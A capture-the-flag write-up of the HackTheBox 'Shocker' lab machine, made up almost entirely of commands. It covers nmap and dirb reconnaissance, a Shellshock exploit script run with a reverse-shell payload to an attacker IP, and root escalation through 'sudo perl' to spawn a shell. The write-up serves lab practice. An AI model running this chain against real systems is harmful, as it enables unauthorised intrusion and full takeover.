HackTheBox: Shocker machine

[Reconnaissance]

1. Port scan

nmap -Pn <ip>

2. Scan for everything

nmap -A -p 80,2222 <ip>

3. Vulnerability scan

nmap --script vuln -p 80,2222 <ip>

4. Try to login with ssh.

ssh <ip> -p 2222

5. Directory fuzzing

dirb http://<ip>

6. Scan /cgi-bin/

dirb http://<ip>/cgi-bin/ -X. sh

Found something, this could mean shellshock.

[Exploitation]

1. Search for exploits

searchsploit shellshock cgi

2. Copy script no.34900

searchsploit -m 34900

3. Read the script for usage

4. Run the script

python 34900.py payload=reverse rhost=<target ip> lhost=<attacker ip> lport=1235 pages=/cgi-bin/user.sh

Success!!!

5. Verify user

whoami

Seems like I have shelly’s privilege

6. read user.txt

cd /home/shelly
cat user.txt

7. Privilege escalation

Verify sudo privileges

sudo -l

I can “sudo perl”.

Use command from this site: https://gtfobins.github.io/gtfobins/perl/#sudo

sudo perl -e 'exec "/bin/sh";'
whoami

Now I’m root.

8. Read root.txt

cd /root
cat root.txt